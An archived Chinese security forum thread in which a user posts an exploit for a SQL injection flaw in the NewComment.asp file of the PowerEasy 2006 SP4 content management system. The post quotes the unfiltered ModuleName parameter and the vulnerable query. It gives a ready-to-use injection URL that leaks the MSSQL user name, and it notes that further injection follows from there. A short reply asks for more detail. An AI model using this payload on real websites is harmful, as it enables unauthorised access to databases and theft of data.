服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

dirtysea 发表于 2007-1-27 21:25:15

动易2006SP4的漏洞利用

今天BCT把动易SP4的漏洞公布了,既然都公布了,那么还是发出来吧!<BR>在NewComment.asp文件中
<DIV>ModuleName = Trim(request("ModuleName"))</DIV>这个ModuleName变量没过滤好,从而导致,我们可以在下面的SQL语句中构造我们的<BR>SQL语句
<DIV>If ModuleName &lt;&gt; "" Then<BR>&nbsp;If ChannelID &lt;&gt; 0 Then<BR>&nbsp;If ClassID &lt;&gt; 0 Then<BR>&nbsp;sqlComment = "Select top " &amp; Num &amp; " C.* from PE_Comment C left join PE_" &amp; ModuleName &amp; " A on C.InfoID=A." &amp; ModuleName &amp; "ID where A.ChannelID= " &amp; ChannelID &amp; " and A.ClassID= " &amp; ClassID &amp; " and C.Passed =" &amp; PE_True<BR><BR>sqlComment = "Select top " &amp; Num &amp; " C.* from PE_Comment C left join PE_" &amp; Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1+and+1=1</DIV>在A.ChannelID=1后就可以构造我们的SQL语句。(其中空格用+来代替。)
<DIV>NewComment.asp?num=1&amp;ChannelID=1&amp;ClassID=1&amp;ModuleName=Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1%20and%20user&gt;0--</DIV>例如这样就可以暴mssql用户名<BR>省下的就是sql注入了

cnhawker 发表于 2006-5-18 03:27:51

re:动易2006SP4的漏洞利用

<P>老大,还有更加详细的吗?</P>
<P>这个自己都有啊</P>
页: [1]
查看完整版本: 动易2006SP4的漏洞利用